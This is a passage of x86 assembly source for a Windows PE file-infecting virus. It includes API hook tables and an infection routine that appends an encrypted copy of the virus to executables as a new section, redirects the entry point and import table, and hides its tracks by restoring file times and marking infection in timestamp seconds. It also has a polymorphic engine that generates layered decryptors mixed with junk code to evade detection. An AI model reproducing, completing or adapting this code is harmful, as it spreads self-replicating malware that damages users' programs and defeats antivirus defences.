		Dd	Offset NFindFirstFileA
		Dd	Offset IFindFirstFileA

		Dd	Offset _FindNextFileA
		Dd	Offset NFindNextFileA
		Dd	Offset IFindNextFileA

KrnlImpCnt	=	($ - Offset KrnlImp)/(3*4)
;BreakCodeLine

;DefCodeLine
ShellImp	Label	DWord
		Dd	Offset _ShellExecuteA
		Dd	Offset NShellExecuteA
		Dd	Offset IShellExecuteA

		Dd	Offset _ShellExecuteEx
		Dd	Offset NShellExecuteEx
		Dd	Offset IShellExecuteEx

		Dd	Offset _ShellExecuteExA
		Dd	Offset NShellExecuteExA
		Dd	Offset IShellExecuteExA

		Dd	Offset _FindExecutableA
		Dd	Offset NFindExecutableA
		Dd	Offset IFindExecutableA

ShellImpCnt	=	($ - Offset ShellImp)/(3*4)
;BreakCodeLine

;DefCodeLine
DialogImp	Label	DWord
		Dd	Offset _GetOpenFileNameA
		Dd	Offset NGetOpenFileNameA
		Dd	Offset IGetOpenFileNameA

		Dd	Offset _GetSaveFileNameA
		Dd	Offset NGetSaveFileNameA
		Dd	Offset IGetSaveFileNameA

DialogImpCnt	=	($ - Offset DialogImp)/(3*4)
;BreakCodeLine

;DefCodeLine
UserImp		Label	DWord
		Dd	Offset _DrawTextA
		Dd	Offset NDrawTextA
		Dd	Offset IDrawTextA

		Dd	Offset _DrawTextExA
		Dd	Offset NDrawTextExA
		Dd	Offset IDrawTextExA

		Dd	Offset _TabbedTextOutA
		Dd	Offset NTabbedTextOutA
		Dd	Offset ITabbedTextOutA

		Dd	Offset _wsprintfA
		Dd	Offset NwsprintfA
		Dd	Offset IwsprintfA

		Dd	Offset _wvsprintfA
		Dd	Offset NwvsprintfA
		Dd	Offset IwvsprintfA

		Dd	Offset _GetTabbedTextExtentA
		Dd	Offset NGetTabbedTextExtentA
		Dd	Offset IGetTabbedTextExtentA

		Dd	Offset _MessageBoxA
		Dd	Offset NMessageBoxA
		Dd	Offset IMessageBoxA

		Dd	Offset _WinHelpA
		Dd	Offset NWinHelpA
		Dd	Offset IWinHelpA

UserImpCnt	=	($ - Offset UserImp)/(3*4)
;BreakCodeLine

;DefCodeLine
GDIImp		Label	DWord
		Dd	Offset _TextOutA
		Dd	Offset NTextoutA
		Dd	Offset ITextOutA

		Dd	Offset _ExtTextOutA
		Dd	Offset NExtTextOutA
		Dd	Offset IExtTextOutA

		Dd	Offset _GetTextExtentPointA
		Dd	Offset NGetTextExtentPointA
		Dd	Offset IGetTextExtentPointA

		Dd	Offset _GetTextExtentPoint32A
		Dd	Offset NGetTextExtentPoint32A
		Dd	Offset IGetTextExtentPoint32A

		Dd	Offset _GetTextExtentExPointA
		Dd	Offset NGetTextExtentExPointA
		Dd	Offset IGetTextExtentExPointA

GDIImpCnt	=	($ - Offset GDIImp)/(3*4)
;BreakCodeLine

;Separator=_Jmp
; ---------------------------------------------------------
; Infector routines
InfectByName:	Push	MemCommitSz/4h
		Call	AllocStackMem		; Infect file by name in EDx
		Cmp	Debug,0h		; (Who in EBx)
		Je	Infect_0$
		Or	EDx,EDx
		Jne	Infect_D$
		Push	30h			; OkOnly+Exclamation
		Push	EBx
		Push	Offset InfNoNameMsg
		Push	0h
		Call	MessageBoxA		; [!!!For DEBUG!!!]
		Push	MemCommitSz/4h
		Call	FreeStackMem
		Ret

Infect_D$:	Push	EBx
		Push	EDx
		Push	21h			; OkCancel+Question
		Push	EBx
		Push	EDx
		Push	0h
		Call	MessageBoxA		; [!!!For DEBUG!!!]
		Pop	EDx
		Cmp	EAx,1h
		Pop	EBx
		Jz	Infect_0$
		Push	30h			; OkOnly+Exclamation
		Push	EBx			; Infecting disabled
		Push	Offset InfCancelMsg	; by Creator
		Push	0h
		Call	MessageBoxA
		Push	MemCommitSz/4h
		Call	FreeStackMem
		Ret

Infect_0$:	Mov	FileNamePtr,EDx		; !!!Ready and Waiting!!!
		Push	EDx
		Call	GetFileAttributesA	; Get file attributes
		Or	EAx,EAx
		Jz	Infect_F0$
		Mov	FileAttributes,EAx
		Push	80h			; File_Attribute_Normal
		Push	DWord Ptr FileNamePtr
		Call	SetFileAttributesA
		Push	0h
		Push	10000000h+80h		; FAN, FFRA
		Push	3h			; OE
		Push	0h
		Push	1h			; FSR
		Push	80000000h+40000000h	; GR/GW
		Push	DWord Ptr FileNamePtr
		Call	CreateFileA		; Try to open
		Cmp	EAx,-1
		Je	Infect_F1$
		Mov	FileHandle,EAx
		Lea	EAx,FileLastWrite	; Storing file Date/Time
		Push	EAx			; for future restoring
		Lea	EAx,FileLastAccess
		Push	EAx
		Lea	EAx,FileCreation
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	GetFileTime

		Lea	EAx,FT_Struc		; Checking infection flag
		Push	EAx
		Lea	EAx,FileLastWrite
		Push	EAx
		Call	FileTimeToSystemTime
		Mov	Ax,FT_Year
		Rol	Ax,1
		Xor	Ax,FT_Month
		Ror	Ax,1
		Xor	Ax,FT_Day
		Rol	Ax,1
		Xor	Ax,FT_Hour
		Ror	Ax,1
		Xor	Ax,FT_Minute
		Rol	Ax,1
		And	Ax,3Ch
		Cmp	Ax,FT_Second		; Already! Good.
		Je	Infect_F2$
		Mov	NewSeconds,Ax

		Push	0h
		Lea	EAx,ProcessedBytes	; Read the DOS file
		Push	EAx			; header
		Push	40h
		Lea	EAx,DosHeader
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	ReadFile
		Or	EAx,EAx			; Error reading
		Jz	Infect_F2$
		Cmp	DWord Ptr ProcessedBytes,40h
		Jne	Infect_F2$		; Readed less then 40h bytes
		Cmp	Word Ptr DosHeader,'MZ'
		Je	Infect_F3$
		Cmp	Word Ptr DosHeader,'ZM'
		Jne	Infect_F2$
Infect_F3$:	Cmp	Word Ptr DosHeader[18h],40h
		Jb	Infect_F2$
		Push	0h			; FileBegin
		Push	0h
		Push	DWord Ptr DosHeader[3Ch]
		Push	DWord Ptr FileHandle	; Seek to PE Header start
		Call	SetFilePointer
		Cmp	EAx,-1
		Je	Infect_F2$
		Push	0h			; Read the PEHeader
		Lea	EAx,ProcessedBytes
		Push	EAx
		Push	PEHeaderSize
		Lea	EAx,PEHeader
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	ReadFile
		Or	EAx,EAx
		Jz	Infect_F2$		; Error reading
		Cmp	DWord Ptr ProcessedBytes,PEHeaderSize
		Jne	Infect_F2$		; Readed too less bytes
		Cmp	DWord Ptr PE_Sign,'EP'
		Jne	Infect_F2$

		MovZx	EAx,Word Ptr PE_NTHdrSize
		Add	EAx,DWord Ptr DosHeader[3Ch]
		Add	EAx,18h
		Mov	PEFileHeaders,EAx
		Push	0h			; Seek to sections descr.
		Push	0h
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1			; Error seeking
		Je	Infect_F2$
		MovZx	ECx,Word Ptr PE_NumOfSections
		Or	ECx,ECx			; No sections
		Jz	Infect_F2$
		Mov	EAx,SectSize
		Mul	ECx
		Add	EAx,PEFileHeaders
		Add	EAx,SectSize
		Cmp	EAx,PE_HeaderSize	; No room for new section!?
		Ja	Infect_F2$

		Mov	DWord Ptr ImportLegal,0h
		Xor	EDx,EDx
		MovZx	ECx,Word Ptr PE_NumOfSections
Infect_AS$:	Inc	EDx
		Push	ECx
		Push	EDx
		Push	0h			; Read the section header
		Lea	EAx,ProcessedBytes
		Push	EAx
		Push	SectSize
		Lea	EAx,Section
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	ReadFile
		Pop	EDx
		Pop	ECx
		Or	EAx,EAx			; Error reading
		Jz	Infect_F2$
		Cmp	DWord Ptr ProcessedBytes,SectSize
		Jne	Infect_F2$		; Readed too less bytes
		Cmp	DWord Ptr ImportLegal,0h
		Jne	Infect_NS$		; Import already detected!
		Mov	EAx,SectRVA
		Cmp	EAx,PE_ImportTableRVA
		Ja	Infect_NS$
		Mov	ImportRVA,EAx
		Add	EAx,SectVirtSize
		Cmp	EAx,PE_ImportTableRVA
		Jbe	Infect_NS$
		Mov	EAx,SectPhysOffs
		Mov	ImportPhysOffs,EAx
		Mov	EAx,SectFlags
		Mov	ImportFlags,EAx
		Mov	ImportOrder,EDx
		Mov	DWord Ptr ImportLegal,-1
Infect_NS$:	Dec	ECx
		Jnz	Infect_AS$
		Cmp	DWord Ptr ImportLegal,0h
		Jz	Infect_F2$		; Import not found ?!

		Mov	EAx,DWord Ptr SelfSectionName
		Mov	SelfSectName,EAx	; SetUp self section name
		Mov	EAx,DWord Ptr SelfSectionName+4
		Mov	SelfSectName+4,EAx
		Mov	EAx,SectRVA
		Add	EAx,SectVirtSize
		Mov	EBx,PE_ObjectAlign
		Call	AlignDWordOnDWord
		Mov	SelfSectRVA,EAx		; SetUp self sect. RVA & Flags
		Mov	DWord Ptr SelfSectFlags,0E0000040h	; R/W/E, IData

		Push	2h			; Seek to EOF
		Push	0h
		Push	0h
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1
		Je	Infect_F2$
		Push	EAx			; SetUp self section
		Mov	EBx,PE_FileAlign	; Physical Offset
		Call	AlignDWordOnDWord
		Mov	SelfSectPhysOffs,EAx
		Pop	EBx
		Sub	EAx,EBx
		Jz	Infect_NoPreA$
		Push	EAx			; Need file alignment
		Mov	ECx,EAx
		Lea	EDi,VeryLargeBuffer
		Cld
		Xor	Al,Al
		Rep	StosB
		Pop	ECx
		Push	ECx
		Push	0h
		Lea	EAx,ProcessedBytes	; Write some null's into
		Push	EAx			; fucking file
		Push	ECx
		Lea	EAx,VeryLargeBuffer
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx
		Pop	ECx
		Jz	Infect_F2$
		Cmp	ECx,ProcessedBytes
		Jne	Infect_F2$

Infect_NoPreA$:	Xor	EBx,EBx
		Lea	EDi,VeryLargeBuffer	; Transfer self to memory
		Mov	ESi,Offset Start
Infect_Trans$:	Mov	Al,[ESi][EBx]
		Mov	[EDi][EBx],Al
		Inc	EBx
		Cmp	EBx,StubImportPlace
		Jb	Infect_Trans$

		Mov	EAx,9h			; Generate the set of
		Call	Random			; polymorphic cryptors
		Add	EAx,8h			; in range (8..16)
		Mov	CryptCnt,EAx
		Lea	EAx,VeryLargeBuffer
		Add	EAx,StubImportPlace
		Mov	EDi,EAx
		Mov	EAx,FixUpsCounter	; Depend on PELINK
		Shl	EAx,2h			; tool linking strategy!
		Add	EAx,FixUpsPlace
		Mov	GenCrSz,EAx
		Xor	EAx,EAx
		Mov	GenSz,EAx
		Mov	GenTotalSz,EAx
Infect_Gen$:	Add	EDi,1000h		; Maximal encryptor size!
Infect_Gen_A$:	Lea	ESi,[EDi-1000h]
		Mov	ECx,GenCrSz
		Push	EDi
		Push	EAx			; Make the cryptor pairs
		Call	GenPolyMorph
		Pop	EAx
		Pop	EDi
		Cmp	EBx,1000h
		Ja	Infect_Gen_A$
		Mov	Cryptors[EAx*8],EBx	; Encryptor size
		Mov	Cryptors[EAx*8+4],EDx	; Decryptor size
		Add	GenSz,EDx
		Add	GenCrSz,EDx
		Add	GenTotalSz,EDx
		Add	GenTotalSz,EBx
		Xchg	ESi,EDi
		Mov	ECx,EDx
		Cld				; Pack cryptors
		Rep	MovsB
		Inc	EAx
		Cmp	EAx,CryptCnt
		Jb	Infect_Gen$

		Lea	EDi,VeryLargeBuffer
		Mov	EBx,Here
		Mov	ESi,FixUpsPlace
		Mov	ECx,FixUpsCounter	; UnDo FixUps
Infect_UnDo1$:	Mov	EAx,[ESi][EBx]
		Sub	[EDi][EAx],EBx
		Add	ESi,4h
		Dec	ECx
		Jnz	Infect_UnDo1$

		Mov	EAx,GenSz		; SetUp PolyMorph sizes
		Mov	EDx,Offset PolyMorphSz
		Sub	EDx,EBx
		Mov	[EDi][EDx],EAx
		Mov	EAx,PE_EntryPointRVA	; SetUp EntryPoint
		Mov	EDx,Offset StubEntryLabel
		Sub	EDx,EBx
		Mov	[EDi][EDx],EAx
		Mov	EAx,SelfSectRVA		; SetUp SelfPlace
		Mov	EDx,Offset CurrentPlace
		Sub	EDx,EBx
		Mov	[EDi][EDx],EAx
		Mov	EAx,PE_ImageBase	; SetUp ImagePlace
		Mov	EDx,Offset ImagePlace
		Sub	EDx,EBx
		Mov	[EDi][EDx],EAx
		Mov	EAx,1h			; SetUp Initialization Flag
		Mov	EDx,Offset InitOk
		Sub	EDx,EBx
		Mov	[EDi][EDx],EAx

		Mov	ESi,ImportPlace		; ReSetUp Import directory
		Mov	ECx,ImportLength
Infect_UnDo2$:	Mov	EDx,[ESi][EBx]		; Get LookUp pointer
		Sub	EDx,CurrentPlace
		Sub	EDx,PolyMorphSz
		Push	EDx
Infect_Un_2$:	Mov	EAx,[EDx][EBx]		; ReSetUp LookUp table
		Or	EAx,EAx
		Jz	Infect_Un_1$
		Sub	EAx,CurrentPlace
		Sub	EAx,PolyMorphSz
		Add	EAx,SelfSectRVA
		Add	EAx,GenSz
		Mov	[EDi][EDx],EAx
		Add	EDx,4h
		Jmp	Infect_Un_2$
Infect_Un_1$:	Pop	EDx
		Add	EDx,SelfSectRVA		; ReSetUp LookUp ptr
		Add	EDx,GenSz
		Mov	[EDi][ESi],EDx
		Mov	EDx,[ESi][EBx]+3*4	; ReSetUp Name ptr
		Sub	EDx,CurrentPlace
		Sub	EDx,PolyMorphSz
		Add	EDx,SelfSectRVA
		Add	EDx,GenSz
		Mov	[EDi][ESi]+3*4,EDx
		Mov	EDx,[ESi][EBx]+4*4	; ReSetUp ImprtAddress ptr
		Sub	EDx,CurrentPlace
		Sub	EDx,PolyMorphSz
		Add	EDx,SelfSectRVA
		Add	EDx,GenSz
		Mov	[EDi][ESi]+4*4,EDx
		Add	ESi,5*4
		Sub	ECx,5*4
		Ja	Infect_UnDo2$

		Lea	ESi,VeryLargeBuffer	; Crypt the self body
		Mov	ECx,StubImportPlace	; before writing it
		Add	ECx,GenTotalSz		; into desired file
		Add	ESi,ECx
		Mov	EDi,ESi
		Add	EDi,GenSz
		Dec	EDi
		Dec	ESi
		Std				; Place buffer at
		Rep	MovsB			; program start
		Mov	ESi,StubImportPlace
		Add	ESi,EDi
		Xor	EAx,EAx
Infect_Crypt$:	Push	EAx
		Mov	ECx,Cryptors[EAx*8+4]
		Lea	EBx,[ESi+1]
		Add	ESi,ECx
		Add	ESi,Cryptors[EAx*8]
		Push	ESi
		Push	EDi
		Std
		Rep	MovsB
		Xchg	EDi,[ESp]
		Inc	EDi
		Push	EBp
		Push	EDi
		Call	EBx			; Crypt by one cryptor
		Pop	EBp
		Pop	EDi
		Pop	ESi
		Pop	EAx
		Inc	EAx
		Cmp	EAx,CryptCnt
		Jb	Infect_Crypt$
		Cld

		Mov	ECx,StubImportPlace
		Add	ECx,GenSz
		Push	ECx
		Push	0h			; WRITE self body
		Lea	EAx,ProcessedBytes	; File pointer
		Push	EAx			; must be at file EOF
		Push	ECx
		Lea	EAx,VeryLargeBuffer
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx			; Error writing
		Pop	EAx
		Jz	Infect_F2$
		Cmp	EAx,ProcessedBytes
		Jne	Infect_F2$		; Too less bytes written

		Mov	EAx,PE_ImportTableRVA	; Calculate import place
		Sub	EAx,ImportRVA		; in file
		Add	EAx,ImportPhysOffs
		Push	0h
		Push	0h
		Push	EAx
		Push	DWord Ptr FileHandle	; And seek in file at
		Call	SetFilePointer		; this position
		Cmp	EAx,-1
		Je	Infect_F2$		; Error seeking
		Lea	EBx,VeryLargeBuffer
Infect_Trans1$:	Push	EBx
		Push	0h
		Lea	EAx,ProcessedBytes	; Read the next import record
		Push	EAx
		Push	5*4
		Push	EBx
		Push	DWord Ptr FileHandle
		Call	ReadFile
		Pop	EBx
		Or	EAx,EAx
		Jz	Infect_F2$		; Errors. . .
		Cmp	DWord Ptr ProcessedBytes,5*4
		Jne	Infect_F2$
		Add	EBx,5*4			; Last import record???
		Cmp	DWord Ptr [EBx][3*4][-5*4],0h
		Jne	Infect_Trans1$
		Lea	EAx,VeryLargeBuffer
		Sub	EBx,EAx
		Push	EBx
		Push	2h			; Seek to EOF
		Push	0h
		Push	0h
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Pop	EBx
		Cmp	EAx,-1			; Errors. . .
		Je	Infect_F2$
		Push	EBx
		Push	0h			; Write all import records
		Lea	EAx,ProcessedBytes	; to target file
		Push	EAx
		Push	EBx
		Lea	EAx,VeryLargeBuffer
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Pop	EBx
		Or	EAx,EAx			; Errors. . .
		Jz	Infect_F2$
		Cmp	ProcessedBytes,EBx
		Jne	Infect_F2$
		Add	EBx,ImportLength	; Calculate the new import
		Mov	PE_ImportDataSz,EBx	; size and RVA
		Mov	EAx,SelfSectRVA
		Add	EAx,GenSz
		Add	EAx,ImportPlace
		Mov	PE_ImportTableRVA,EAx

		Lea	EDi,VeryLargeBuffer	; Generate some random trash
		Mov	EAx,100h
		Call	Random
		Lea	ECx,[EAx+10h]
		Push	ECx
		Cld
Infect_Trash$:	Mov	EAx,100h
		Call	Random
		StosB
		Dec	ECx
		Jnz	Infect_Trash$
		Mov	ECx,[ESp]
		Push	0h			; and write it into
		Lea	EAx,ProcessedBytes	; fucking file, at them
		Push	EAx			; end
		Push	ECx
		Lea	EAx,VeryLargeBuffer
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx			; Error writing!
		Pop	EAx
		Jz	Infect_F2$
		Cmp	EAx,ProcessedBytes	; Too less bytes written
		Jne	Infect_F2$

		Push	2h			; Seek to EOF
		Push	0h
		Push	0h
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1			; Seeking failure
		Je	Infect_F2$
		Sub	EAx,SelfSectPhysOffs	; SetUp self section sizes
		Mov	SelfSectVirtSize,EAx
		Mov	EBx,PE_FileAlign
		Call	AlignDWordOnDWord
		Mov	SelfSectPhysSize,EAx
		Sub	EAx,SelfSectVirtSize
		Jz	Infect_ToDone$		; Need file align?
		Mov	ECx,EAx
		Push	ECx
		Mov	Al,0h			; Prepare aligning buffer
		Cld
		Lea	EDi,VeryLargeBuffer
		Rep	StosB
		Pop	ECx
		Push	ECx			; And align the file
		Push	0h
		Lea	EAx,ProcessedBytes
		Push	EAx
		Push	ECx
		Lea	EAx,VeryLargeBuffer
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Pop	ECx
		Or	EAx,EAx			; Error writing!
		Jz	Infect_F2$
		Cmp	DWord Ptr ProcessedBytes,ECx
		Jne	Infect_F2$		; Too less bytes written

Infect_ToDone$:	Mov	EAx,SelfSectVirtSize	; SetUp memory requirement
		Mov	EBx,PE_ObjectAlign
		Call	AlignDWordOnDWord
		Add	PE_ImageSize,EAx
		Add	PE_SizeOfIData,EAx
		Mov	EAx,SelfSectRVA		; SetUp Self EntryPoint
		Mov	PE_EntryPointRVA,EAx
		Mov	EAx,PE_StackReserveSz	; SetUp stack size
		Add	EAx,MemCommitSz		; (for placing temporary
		Mov	PE_StackReserveSz,EAx	; buffer)

		MovZx	EAx,Word Ptr PE_NumOfSections
		Mov	ECx,SectSize
		Mul	ECx
		Add	EAx,PEFileHeaders
		Push	0h			; Prepare to write
		Push	0h			; SelfSection descriptor
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1			; Errors. . .
		Je	Infect_F2$
		Push	0h			; And write it!
		Lea	EAx,ProcessedBytes
		Push	EAx
		Push	SelfSectSize
		Lea	EAx,SelfSection
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx
		Jz	Infect_F2$		; Errors. . .
		Cmp	DWord Ptr ProcessedBytes,SelfSectSize
		Jne	Infect_F2$

		Mov	ECx,DWord Ptr ImportOrder
		Mov	EAx,SectSize		; Prepare to write import
		Mul	ECx			; section flags
		Add	EAx,PEFileHeaders	; Warning!!!
		Sub	EAx,4h			; Import section Flags
		Push	0h			; is the LAST field in
		Push	0h			; section header structure
		Push	EAx			; !!!!!!!!!!!!!!!!!!!!!!!!
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1h			; Seeking failure
		Je	Infect_F2$

		Or	DWord Ptr ImportFlags,0C0000000h
		Push	0h			; Enable reading
		Lea	EAx,ProcessedBytes	; and writing
		Push	EAx			; in Import section
		Push	4h
		Lea	EAx,ImportFlags
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx
		Jz	Infect_F2$		; Errors. . .
		Cmp	DWord Ptr ProcessedBytes,4h
		Jne	Infect_F2$

		Inc	Word Ptr PE_NumOfSections	; New # of sections
		Push	0h			; Prepare to writing
		Push	0h			; PE header
		Push	DWord Ptr DosHeader[3Ch]
		Push	DWord Ptr FileHandle
		Call	SetFilePointer
		Cmp	EAx,-1
		Je	Infect_F2$
		Push	0h
		Lea	EAx,ProcessedBytes
		Push	EAx
		Push	PEHeaderSize		; And write it
		Lea	EAx,PEHeader
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	WriteFile
		Or	EAx,EAx
		Jz	Infect_F2$		; Errors. . .
		Cmp	DWord Ptr ProcessedBytes,PEHeaderSize
		Jne	Infect_F2$

		Mov	Ax,NewSeconds		; Ok! Set infection flag.
		Mov	FT_Second,Ax
		Lea	EAx,FileLastWrite
		Push	EAx
		Lea	EAx,FT_Struc
		Push	EAx
		Call	SystemTimeToFileTime

Infect_F2$:	Lea	EAx,FileLastWrite	; Restore file Date/Time
		Push	EAx
		Lea	EAx,FileLastAccess
		Push	EAx
		Lea	EAx,FileCreation
		Push	EAx
		Push	DWord Ptr FileHandle
		Call	SetFileTime

		Push	DWord Ptr FileHandle	; Close our file. Ooh, Yes!
		Call	CloseHandle

Infect_F1$:	Push	DWord Ptr FileAttributes; Restore file attributes
		Push	DWord Ptr FileNamePtr
		Call	SetFileAttributesA
Infect_F0$:	Push	MemCommitSz/4h
		Call	FreeStackMem
		Ret

; ---------------------------------------------------------
; Service routines
;
AllocStackMem:	Pop	EAx			; Allocate memory in Stack
		Pop	ECx			; Corrupt EAx,ECx !!!
		Push	EBp			; Do not use call stack
AllocStack_1$:	Push	0h			; before this call
		Dec	ECx
		Jnz	AllocStack_1$
		Mov	EBp,ESp
		Push	EAx
		Ret

FreeStackMem:	Pop	EAx			; Free memory in Stack
		Pop	ECx			; Corrupt EAx,ECx !!!
FreeStack_1$:	Pop	DropDWord		; Do not use stack
		Dec	ECx			; memory after this call
		Jnz	FreeStack_1$
		Pop	EBp
		Push	EAx
		Ret
DropDWord	Dd	?

AlignDWordOnDWord:
		Push	EDx
		Xor	EDx,EDx			; Align EAx by EBx boundary
		Push	EAx
		Div	EBx
		Pop	EAx
		Or	EDx,EDx
		Jz	AlignDWord_0$
		Sub	EAx,EDx
		Add	EAx,EBx
AlignDWord_0$:	Pop	EDx
		Ret

; ---------------------------------------------------------
; My string converter ;-)
ConvertStr:	Cld				; Convert some string
		Call	InitConverter		; in EDx with
		Mov	ESi,EDx			; possibly length in ECx
		Lea	EDi,SmallBuffer		; (Corrupt EDi,ESi,EAx)
		Push	ESi
		Push	EDi
		Push	ECx
		Push	EBx
		Cmp	ECx,-1h
		Je	Convert_Mode1$

		Or	ECx,ECx
		Jz	Convert_Done$
Convert_Mode0$:	Call	ProcessChar		; Counter mode
		Dec	ECx
		Jnz	Convert_Mode0$
		Pop	EBx
		Pop	ECx
		Pop	EDx
		Pop	ECx
		Mov	Byte Ptr Es:[EDi],0h
		Sub	EDi,EDx
		Mov	ECx,EDi
		Ret

Convert_Mode1$:	Call	ProcessChar		; ASCIZ mode
		Cmp	Byte Ptr [ESi][-1],0h
		Jne	Convert_Mode1$
		Pop	EBx
		Pop	ECx
		Pop	EDx
		Pop	EAx
		Ret

Convert_Done$:	Pop	EBx
		Pop	ECx
		Pop	EDi
		Pop	ESi
		Mov	Byte Ptr Es:[EDi],0h
		Ret

ProcessChar:	LodsB				; Process one char, empty
		StosB				; strings are not allowed!!!
		Cmp	Al,'a'
		Jb	Process_1$		; UpCase the source char
		Cmp	Al,'z'
		Ja	Process_1$
		Sub	Al,20h
Process_1$:	Push	ECx
		Push	EBx
		Push	EDx
		Mov	ECx,ConvertDataLen
		Xor	EBx,EBx			; Try the some variants
Process_Again$:	Mov	EDx,[EBx*4]ConvertVar
		Mov	Ah,[EDx]
		Inc	DWord Ptr [EBx*4]ConvertVar
		Cmp	Al,Ah			; Good char?
		Jne	Process_Bad$
		Cmp	Byte Ptr [EDx][1],0h	; Last char in variant?
		Jne	Process_Next$

		Sub	EDx,[EBx*8][ConvertData]
		Sub	EDi,EDx			; Make the replacing
		Dec	EDi
		Push	ESi
		Mov	ESi,[EBx*8+4][ConvertData]
Process_Do$:	LodsB				; Transfer the real string
		StosB				; converted by me ;-)
		Cmp	Al,0h
		Jne	Process_Do$
		Dec	EDi
		Pop	ESi
		Push	DWord Ptr [EBx*8][ConvertData]
		Pop	DWord Ptr [EBx*4]ConvertVar
		Jmp	Process_Ok$

Process_Bad$:	Push	DWord Ptr [EBx*8][ConvertData]
		Pop	DWord Ptr [EBx*4]ConvertVar
Process_Next$:	Inc	EBx			; Next variant
		Dec	ECx
		Jnz	Process_Again$
Process_Ok$:	Pop	EDx			; Char has been processed
		Pop	EBx
		Pop	ECx
		Ret

InitConverter:	Push	EBx			; InitConverter routines
		Push	ECx
		Mov	ECx,ConvertDataLen
		Xor	EBx,EBx
InitConv_1$:	Push	DWord Ptr [EBx*8][ConvertData]
		Pop	DWord Ptr [EBx*4]ConvertVar
		Inc	EBx
		Dec	ECx
		Jnz	InitConv_1$
		Pop	ECx
		Pop	EBx
		Ret

Transfer_Str:	Cmp	ECx,-1h			; More strict strings
		Je	Transfer_S_M$		; moving routine
		Or	ECx,ECx
		Jz	Transfer_S_D$
		Rep	MovsB
Transfer_S_D$:	Xor	Al,Al
		StosB
		Ret

Transfer_S_M$:	LodsB
		StosB
		Or	Al,Al
		Jnz	Transfer_S_M$
		Ret

; ---------------------------------------------------------
; The PolyMorph code has the such structure:
;           PushA
;           Call   Start
;           ...
; Sem:      Dd     1h
;           ...
; Start:    Pop    BaseReg
;           Xor    SemReg,SemReg (And SemReg,0) (Mov SemReg,0)
; LockSem:  Xchg   [BaseReg][Sem],SemReg
;           Or     SemReg,SemReg (Test SemReg,SemReg) (And SemReg,SemReg)
;           Jz     LockSem
;           Cmp    SemReg,2h
;           Je     Done
;           Add    BaseReg,CodeStart
;           Add    [BaseReg][Border],BaseReg
;           .LoadRegisters
; Again:    .Decrypt
;           Add    Base,4h (Inc Base) 4 times
;           Cmp    Base,Border
;           Jb     Again
;           Sub    BaseReg,CodeStart+CodeSize
; Done:     Mov    [BaseReg][Sem],2h
;           PopA
; CodeStart:
;
; All code mixed with trash. . .               Prepare to understand!

GenPolyMorph:	Push	ESi
		Push	EDi
		Push	ECx
		Call	GetNoESpReg		; Choose the 2 base
		Mov	pBaseReg,Al		; registers
		Mov	Bl,Al			; Base
GenPolyM_R$:	Call	GetNoESpReg
		Cmp	Bl,Al
		Je	GenPolyM_R$
		Mov	pSemReg,Al		; and Semaphore
		Mov	Byte Ptr pEnableEncr,0h
		Mov	ECx,5h
		Mov	EBx,Offset GenNoRegCom
		Call	Enumer
		Mov	Al,60h			; PushA
		StosB
		Mov	Ax,-1h
		Mov	EBx,Offset GenAnyCom
		Call	Enumer
		Mov	Al,0E8h			; Call $+...
		StosB
		Mov	EAx,50h
		Call	Random
		Add	EAx,10h
		Push	EAx
		StosD
		Mov	pBase,EDi
		Mov	ECx,EAx
GenPolyM_C$:	Mov	EAx,100h
		Call	Random
		StosB
		Dec	ECx
		Jnz	GenPolyM_C$
		Pop	EAx
		Sub	EAx,4h
		Call	Random
		Mov	pSem,EAx
		Add	EAx,pBase		; SetUp semaphore
		Mov	DWord Ptr [EAx],1h
		Mov	Al,pBaseReg		; Pop BaseReg
		Or	Al,58h
		StosB
		Mov	Ah,-1h
		Mov	Al,pBaseReg
		Mov	ECx,5h
		Mov	EBx,Offset GenAnyCom
		Call	Enumer
		Mov	EAx,2h			; Xor SemReg,SemReg
		Call	Random
		Or	Al,Al
		Jz	GenPolyM_X$
		Mov	Al,2h
		Call	Random
		Or	Al,Al
		Jz	GenPolyM_XM$
		Mov	Al,81h			; (And)
		StosB
		Mov	Al,pSemReg
		Or	Al,0E0h
		StosB
		Xor	EAx,EAx
		StosD
		Jmp	GenPolyM_XD$
GenPolyM_XM$:	Mov	Al,0B8h			; (Mov)
		Or	Al,pSemReg
		StosB
		Xor	EAx,EAx
		StosD
		Jmp	GenPolyM_XD$
GenPolyM_X$:	Mov	Al,2h			; (Xor)
		Call	Random
		Add	EAx,EAx
		Or	Al,31h
		StosB
		Mov	Al,pSemReg
		Shl	Al,3h
		Or	Al,pSemReg
		Or	Al,0C0h
		StosB
GenPolyM_XD$:	Mov	Al,pSemReg
		Mov	Ah,pBaseReg
		Call	Enumer
		Mov	pXchg,EDi
		Mov	Al,87h			; Xchg SemReg,[BaseReg][Sem]
		StosB
		Mov	Al,pSemReg
		Shl	Al,3h
		Or	Al,80h
		Or	Al,pBaseReg
		StosB
		Mov	EAx,pSem
		StosD
		Mov	Al,pBaseReg
		Mov	Ah,pSemReg
		Call	Enumer
		Mov	EAx,4h			; Or SemReg,SemReg
		Call	Random
		Jz	GenPolyM_OC$
		Mov	Al,3h			; (And) (Test) (Or)
		Call	Random
		Shl	Al,3h
		Mov	Cl,Al
		Mov	EAx,092185h
		Shr	EAx,Cl
		Cmp	Al,85h
		Je	GenPolyM_O$
		Push	EAx
		Mov	EAx,2h
		Call	Random
		Or	Al,Al
		Pop	EAx
